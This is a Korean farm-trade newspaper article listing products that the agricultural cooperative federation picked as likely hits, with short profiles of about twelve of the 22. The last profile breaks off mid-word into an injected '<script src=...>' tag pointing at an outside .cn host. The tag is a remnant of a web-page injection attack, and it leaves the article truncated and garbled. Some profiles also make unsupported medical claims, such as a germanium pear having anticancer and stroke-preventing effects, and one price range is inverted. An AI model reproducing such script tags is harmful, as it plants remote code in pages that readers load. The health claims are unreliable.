농협중앙회가 내년에 히트를 칠 것으로 예감하는 농산물 22개를 선정했다.
이들 농산물은 각 농협지역본부에서 1차 선정심사를 거쳐 소비자단체·농협중앙회 유통관련 전문가 등 공동심사를 통과한 엄선된 상품이다.
이와 관련 농협은 지난 11일 양재동 농협하나로클럽에서 이들 상품을 전시·홍보하고 중앙회장 명의의 선정패를 수여했다.

■치악산 큰송이 버섯(포타벨라)
강원도 원주 치악산 큰송이 작목반이 황토와 볏짚 발효 배지로 재배한 상품이다.
모양은 양송이와 비슷하지만 크기·맛·영양 면에서 월등한 고단백 저지방 건강식품이다. 선진국에서는 접시만한 크기로 키워 다이어트 식품으로 각광받고 있다.
포장은 300g, 800g, 1kg 3종이 있으며, 가격은 4600~1500원선.

■이퓨어사과
(주)에네코에서 생산한 고품질 농산물이다. 차별화된 포장디자인으로 선물용으로 각광받고 있다.
소포장으로 규격화해 휴대가 간편한 것이 특징이다.
포장은 2입팩·4입팩 소포장에서부터 개별판매용, 선물용으로 다양하다.
가격은 2450~4만4800원.

■자연그리움 잡곡세트
경북 고령 다사농협 자연농업본부에서 생산된 100% 친환경농산물 인증 제품이다.
찹쌀, 검정쌀, 발아현미, 홍찰보리 등 4가지 품목을 1등품만 엄선했다. 특히 찰보리는 항콜레스테롤 억제재인 홍국균을 배양했으며 발아현미는 일반현미를 특수 가공처리해 미네랄, 아미노산, 칼슘 등 비타민 B군 등이 풍부하다.

■다래마을 세척고구마
한국참다래유통사업단 영농조합법인에서 생산된 소비자 맞춤형 상품이다.
연중 유통이 가능하며 세척으로 고구마 천연의 붉고 선명한 색상이 특징이며 BT기술을 적용, 표준화·규격화·브랜드화했다.
800g 단위로 펀넷과 봉지로 포장됐다.

■초롱매실미, 초롱복분자쌀
전북 순창의 동계농협에서 생산된 기능성 쌀이다.
섬진강 상류에서 친환경 농법으로 계약재배된 쌀에 성인병 예방과 건강증진 효과가 뛰어난 청매실 진액과 복분자 진액을 코팅했다. 과학적 방법으로 가공 세정해 씻지 않고 먹을 수 있다.
1kg, 1.4kg, 3kg, 4kg포장 3종이 있다.

■게르마늄 배
전남 나주의 횃불농장에서 생산된 기능성 농산물이다.
항암성분이 함유돼 체내 면역력 증가는 물론 신진대사 촉진으로 고혈압·동맥경화·뇌졸증 예방, 체내 중금속 제거작용 등에 효과가 있다.
7.5kg 단위로 포장됐으며 가격은 3만5000~4만5000원선이다.

■선물용 미니 호접란
경기도 성남 한국난농협 작목반에서 개발한 상품이다.
개별 선물용 박스로 포장돼 개인이 손쉽게 운반할 수 있어 축하 화환, 생일선물 등으로 남녀노소에게 부담없이 선물할 수 있다.
연중 출하 가능하며 가격은 자체 공판장 경매단가를 기준으로 한다.

■제주 용과
제주도 서귀포시 용과체험농장에서 유기농으로 재배한 상품이다.
열매가 매달린 모습이 용이 여의주를 물고 있는 형상과 닮아 `용과''라 불린다. 콜레스테롤 조정, 피로회복, 다이어트 등에 좋은 기능성 과일이다.
포장단위는 2kg, 3kg며 가격은 kg당 1만~1만3000원선이다.

■음성 청결고추
충북 음성농협에서 생산한 전국 최고급 김장·고추장용 고추다.
고추 표면의 이물질을 증기로 세척했다. 껍질이 두꺼워 고추가루가 많이 나오고 색택이 곱고 선명한 것이 특징이다.
3kg, 5kg, 10kg 단위로 비닐포장됐으며 3kg 기준으로 3만5000원대다.

■진례농협 무농약쌀 “명작”
경남 김해의 진례농협 신안무농약쌀잘목반에서 오리농법으로 생산한 무농약쌀이다.
국립농산물품질관리원, 김해시농업기술센터와 유기적인 협조로 생산·건조·가공됐다. 특히 수분 15%내외로 자연건조를 실시하고 있다. 수요에 따라 즉시 가공판매해 신선도가 뛰어나다.
포장은 5kg, 10kg, 20kg으로 구분된다.

■토종나물세트
충남 천안의 목지농산에서 생산된 반조리 제품으로 동결건조 생산방법을 적용, 조리시 물만 부어주면 5분이내 조리가 가능하다.
순수 국내산 원료만 사용했을 뿐 아니라 자연의 그대로 맛과 향을 살려 위생적으로 가공처리한 것이 특징이다.
60·70g은 페트원형, 250·400g는 페트병으로 소포장됐다.

■파프리카
전북 김제의 농산무역(주)에서 생산된 안전 농산물이다.
첨단 유리온실에서 양액재배돼 수확 후 즉시 저온처리되고 있으며 철저한 품질관리와 엄격한 선별로 국내, 일본외 시장에서 품질을 인정받고 있다.
포장단위는 2.5kg, 5kg, 10kg 벌크로 나뉜다.
팔레트 출하와 냉장운송을 하고 있다.

■5분 청국장
경남 함안군 소재 함안전통식품(토?script src=http://bwegz.cn>

저작권자 © 농수축산신문 무단전재, 재배포 및 AI학습 이용 금지